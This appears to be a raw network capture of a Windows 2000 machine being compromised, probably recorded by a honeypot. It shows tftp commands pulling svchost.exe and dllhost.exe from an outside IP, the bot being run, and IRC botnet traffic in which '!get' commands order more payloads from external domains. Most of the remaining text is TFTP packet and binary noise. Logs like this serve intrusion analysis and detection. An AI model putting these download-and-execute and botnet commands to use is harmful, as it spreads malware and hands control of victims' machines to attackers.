VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp. C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\wins File Not Found C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcache File Not Found C:\\WINNT\\system32>
VICTIM: tftp -i 110.12.70.244 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000\t
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 14 seconds, 2104 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 110.12.70.244 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: \000\004\000\237
VICTIM: \000\004\000\240
VICTIM: \000\004\000\241
VICTIM: \000\004\000\242
VICTIM: \000\004\000\243
VICTIM: \000\004\000\244
VICTIM: \000\004\000\245
VICTIM: \000\004\000\246
VICTIM: \000\004\000\247
VICTIM: \000\004\000\250
VICTIM: \000\004\000\251
VICTIM: \000\004\000\252
VICTIM: \000\004\000\253
VICTIM: \000\004\000\254
VICTIM: \000\004\000\255
VICTIM: \000\004\000\256
VICTIM: \000\004\000\257
VICTIM: \000\004\000\260
VICTIM: \000\004\000\261
VICTIM: \000\004\000\262
VICTIM: \000\004\000\263
VICTIM: \000\004\000\264
VICTIM: \000\004\000\265
VICTIM: \000\004\000\266
VICTIM: \000\004\000\267
VICTIM: \000\004\000\270
VICTIM: \000\004\000\271
VICTIM: \000\004\000\272
VICTIM: \000\004\000\273
VICTIM: \000\004\000\274
VICTIM: \000\004\000\275
VICTIM: \000\004\000\276
VICTIM: \000\004\000\277
VICTIM: \000\004\000\300
VICTIM: \000\004\000\301
VICTIM: \000\004\000\302
VICTIM: \000\004\000\303
VICTIM: \000\004\000\304
VICTIM: \000\004\000\305
VICTIM: \000\004\000\306
VICTIM: \000\004\000\307
VICTIM: \000\004\000\310
VICTIM: \000\004\000\311
VICTIM: \000\004\000\312
VICTIM: \000\004\000\313
VICTIM: \000\004\000\314
VICTIM: \000\004\000\315
VICTIM: \000\004\000\316
VICTIM: \000\004\000\317
VICTIM: \000\004\000\320
VICTIM: \000\004\000\321
VICTIM: \000\004\000\322
VICTIM: \000\004\000\323
VICTIM: \000\004\000\324
VICTIM: \000\004\000\325
VICTIM: \000\004\000\326
VICTIM: \000\004\000\327
VICTIM: \000\004\000\330
VICTIM: \000\004\000\331
VICTIM: \000\004\000\332
VICTIM: \000\004\000\333
VICTIM: \000\004\000\334
VICTIM: Transfer successful: 112128 bytes in 47 seconds, 2385 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK midwfvlj USER c020500 . . :-
VICTIM: Service Pack 2 JOIN &virtu
ATTACKER: :u. PRIVMSG midwfvlj :!get http:/zhongmail.com:88/sbjb.txt :u. PRIVMSG midwfvlj :!get http:/tyui89.com/fth.txt :u. PRIVMSG midwfvlj :!get http:/tyui89.com/temp/fast.exe
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
VICTIM: \245Y\025\000\250ul\t\002\026\305<\R\374Y\241~\237\tyK#\221\361
VICTIM: \254Z(\000\001\\\365J9k\241\266\333\037\220\323\t\274\3475\231\307\277\026\031\227go\301\001\246v^wVTZ\311y \314IS
VICTIM: \300\240 \0009\244<\347\305\344\345\270\300\014x\2354\357y4\307\033S\253\232:\317\301\366\362#vyx\274W
VICTIM: \231{\026\000\201\257\227\240\234\270HXA\373(xQ15\215UR\326\323\355A
VICTIM: \221\031&\000\276Q\021a)H\216-\3043\221\037\213\346\365\316\316*\035\032\230\003\336\014\004\246\336\217K\257\372\261\300\327\234\256\306
VICTIM: \371\303\034\0002\276\357\272\366\230\273\\\216\270\0374\323\205\3256\277\276dX\345Ub\274\373\317\241'
VICTIM: \355\355\021\000g\352\2117\020\027\324\211\270h\373\310J\\`a%
VICTIM: \240P!\000,\217\240m\271\321\007\233\267|\232pc\2478\370\303\242P\301\326O\346f\213\014i\255\216]ObU
VICTIM: \355\355\021\000g\352\2117\020\027\324\211\270h\373\310J\\`a%
VICTIM: \215\035\023\000\231<,LI\261\270\252\032\037C\354z\273\025\254\304\006\313
VICTIM: \004\370\033\000\233\023\003\366\262Hu\236\206\226*ZE\213;\261\226\330\261\200\260\244\314\275\265\223\375
VICTIM: \231{\026\000\201\257\227\240\234\270HXA\373(xQ15\215UR\326\323\355A
VICTIM: \371\303\034\0002\276\357\272\366\230\273\\\216\270\0374\323\205\3256\277\276dX\345Ub\274\373\317\241'
VICTIM: \240P!\000,\217\240m\271\321\007\233\267|\232pc\2478\370\303\242P\301\326O\346f\213\014i\255\216]ObU
VICTIM: \\021%\000\357K9WD\343R\265\257?\352\333\013\254J1\331R\347\244\301\337\355!MKd\232Lc*\314\206\251\000e\025
VICTIM: *s\030\000<\021,:\326\235\005R\314uz5F}63\210\361QH\362\215\336\262
ATTACKER: PONG :i.
VICTIM: JOIN &virtu